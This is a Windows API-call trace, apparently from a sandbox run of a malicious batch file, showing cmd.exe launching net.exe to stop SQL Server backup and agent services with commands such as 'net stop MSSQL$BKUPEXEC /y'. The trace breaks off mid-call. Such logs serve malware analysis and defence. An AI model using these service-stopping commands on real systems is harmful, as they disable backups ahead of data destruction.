_wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0202.835] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0202.835] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0202.835] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0202.835] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0202.835] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0202.835] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0202.835] _wcsicmp (_String1="net", _String2="VER") returned -8 [0202.835] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0202.835] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0202.835] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0202.835] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0202.835] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0202.835] _wcsicmp (_String1="net", _String2="START") returned -5 [0202.835] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0202.835] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0202.835] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0202.835] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0202.835] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0202.835] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0202.835] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0202.835] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0202.835] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0202.835] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0202.836] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0202.836] SetErrorMode (uMode=0x0) returned 0x1 [0202.836] GetProcessHeap () returned 0x3e0000 [0202.836] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0202.836] GetProcessHeap () returned 0x3e0000 [0202.836] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0202.836] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0202.836] GetProcessHeap () returned 0x3e0000 [0202.836] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0202.836] GetProcessHeap () returned 0x3e0000 [0202.836] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0202.837] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.837] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0202.837] GetLastError () returned 0x2 [0202.837] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0202.838] GetLastError () returned 0x2 [0202.838] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.838] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0202.838] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0202.839] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0202.839] GetLastError () returned 0x2 [0202.839] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0202.839] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0202.840] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.840] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0202.840] SetErrorMode (uMode=0x0) returned 0x1 [0202.840] GetProcessHeap () returned 0x3e0000 [0202.840] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0202.840] GetProcessHeap () returned 0x3e0000 [0202.840] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0202.841] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0202.841] GetProcessHeap () returned 0x3e0000 [0202.841] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0202.841] GetProcessHeap () returned 0x3e0000 [0202.841] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0202.841] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.842] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0202.842] GetLastError () returned 0x2 [0202.842] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0202.842] GetLastError () returned 0x2 [0202.842] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.843] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0202.843] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0202.843] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0202.843] GetLastError () returned 0x2 [0202.844] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0202.844] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0202.844] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.844] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0202.844] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0202.845] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0202.845] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0202.845] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQL$BKUPEXEC /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQL$BKUPEXEC /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQL$BKUPEXEC /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xbc8, dwThreadId=0x5cc)) returned 1 [0202.849] CloseHandle (hObject=0x78) returned 1 [0202.849] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0202.849] GetProcessHeap () returned 0x3e0000 [0202.849] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0202.849] GetEnvironmentStringsW () returned 0x3f8408* [0202.849] GetProcessHeap () returned 0x3e0000 [0202.849] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0202.849] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0202.849] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0202.980] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0202.980] CloseHandle (hObject=0x74) returned 1 [0202.980] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0202.980] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0202.980] GetProcessHeap () returned 0x3e0000 [0202.980] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0202.980] GetEnvironmentStringsW () returned 0x3f8408* [0202.980] GetProcessHeap () returned 0x3e0000 [0202.980] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0202.981] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0202.981] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0202.981] GetProcessHeap () returned 0x3e0000 [0202.981] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0202.981] GetEnvironmentStringsW () returned 0x3f8408* [0202.981] GetProcessHeap () returned 0x3e0000 [0202.981] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0202.981] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0202.981] GetProcessHeap () returned 0x3e0000 [0202.981] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0202.981] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0202.981] _get_osfhandle (_FileHandle=1) returned 0x264 [0202.981] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0202.982] _get_osfhandle (_FileHandle=1) returned 0x264 [0202.982] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0202.982] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0202.982] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0202.982] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0202.982] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0202.982] SetConsoleInputExeNameW () returned 0x1 [0202.982] GetConsoleOutputCP () returned 0x1b5 [0202.982] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0202.982] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.983] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0202.983] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0202.983] _get_osfhandle (_FileHandle=3) returned 0x74 [0202.983] SetFilePointer (in: hFile=0x74, lDistanceToMove=3546, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xdda [0202.983] GetProcessHeap () returned 0x3e0000 [0202.983] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0202.983] GetProcessHeap () returned 0x3e0000 [0202.983] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0202.983] GetProcessHeap () returned 0x3e0000 [0202.983] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0202.983] GetProcessHeap () returned 0x3e0000 [0202.983] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0202.983] GetProcessHeap () returned 0x3e0000 [0202.983] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0202.983] GetProcessHeap () returned 0x3e0000 [0202.983] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0202.983] GetProcessHeap () returned 0x3e0000 [0202.983] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0202.983] GetProcessHeap () returned 0x3e0000 [0202.983] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0202.983] GetProcessHeap () returned 0x3e0000 [0202.983] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0202.983] GetProcessHeap () returned 0x3e0000 [0202.983] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0202.983] GetProcessHeap () returned 0x3e0000 [0202.983] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0202.983] GetProcessHeap () returned 0x3e0000 [0202.983] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0202.983] GetProcessHeap () returned 0x3e0000 [0202.983] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0202.984] _get_osfhandle (_FileHandle=3) returned 0x74 [0202.984] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xdda [0202.984] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xae7, lpOverlapped=0x0) returned 1 [0202.984] SetFilePointer (in: hFile=0x74, lDistanceToMove=3581, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xdfd [0202.984] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=35, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SQLAgent$PRACTTICEBGC /y\r\n /y\r\n/y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 35 [0202.984] _get_osfhandle (_FileHandle=3) returned 0x74 [0202.984] GetFileType (hFile=0x74) returned 0x1 [0202.984] _get_osfhandle (_FileHandle=3) returned 0x74 [0202.984] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xdfd [0202.984] GetProcessHeap () returned 0x3e0000 [0202.984] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0202.984] GetProcessHeap () returned 0x3e0000 [0202.984] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0202.987] _tell (_FileHandle=3) returned 3581 [0202.988] _close (_FileHandle=3) returned 0 [0202.988] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0202.988] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0202.988] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0202.988] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0202.988] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0202.988] _wcsicmp (_String1="net", _String2="CD") returned 11 [0202.988] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0202.988] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0202.988] _wcsicmp (_String1="net", _String2="REN") returned -4 [0202.988] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0202.988] _wcsicmp (_String1="net", _String2="SET") returned -5 [0202.988] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0202.988] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0202.988] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0202.988] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0202.988] _wcsicmp (_String1="net", _String2="MD") returned 1 [0202.988] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0202.988] _wcsicmp (_String1="net", _String2="RD") returned -4 [0202.988] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0202.988] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0202.988] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0202.988] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0202.988] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0202.988] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0202.988] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0202.988] _wcsicmp (_String1="net", _String2="VER") returned -8 [0202.988] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0202.988] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0202.988] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0202.988] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0202.988] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0202.988] _wcsicmp (_String1="net", _String2="START") returned -5 [0202.988] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0202.989] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0202.989] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0202.989] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0202.989] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0202.989] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0202.989] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0202.989] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0202.989] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0202.989] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0202.989] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0202.989] SetErrorMode (uMode=0x0) returned 0x1 [0202.989] GetProcessHeap () returned 0x3e0000 [0202.989] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0202.989] GetProcessHeap () returned 0x3e0000 [0202.989] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0202.990] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0202.990] GetProcessHeap () returned 0x3e0000 [0202.990] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0202.990] GetProcessHeap () returned 0x3e0000 [0202.990] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0202.990] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.991] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0202.991] GetLastError () returned 0x2 [0202.991] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0202.991] GetLastError () returned 0x2 [0202.992] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.992] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0202.992] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0202.993] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0202.993] GetLastError () returned 0x2 [0202.993] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0202.993] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0202.993] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.994] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0202.994] SetErrorMode (uMode=0x0) returned 0x1 [0202.994] GetProcessHeap () returned 0x3e0000 [0202.994] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0202.994] GetProcessHeap () returned 0x3e0000 [0202.994] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0202.994] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0202.994] GetProcessHeap () returned 0x3e0000 [0202.995] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0202.995] GetProcessHeap () returned 0x3e0000 [0202.995] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0202.995] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.995] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0202.995] GetLastError () returned 0x2 [0202.996] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0202.996] GetLastError () returned 0x2 [0202.996] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.997] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0202.997] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0202.997] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0202.997] GetLastError () returned 0x2 [0202.998] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0202.998] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0202.998] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.998] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0202.998] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0202.998] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0202.999] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0202.999] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLAgent$PRACTTICEBGC /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLAgent$PRACTTICEBGC /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, 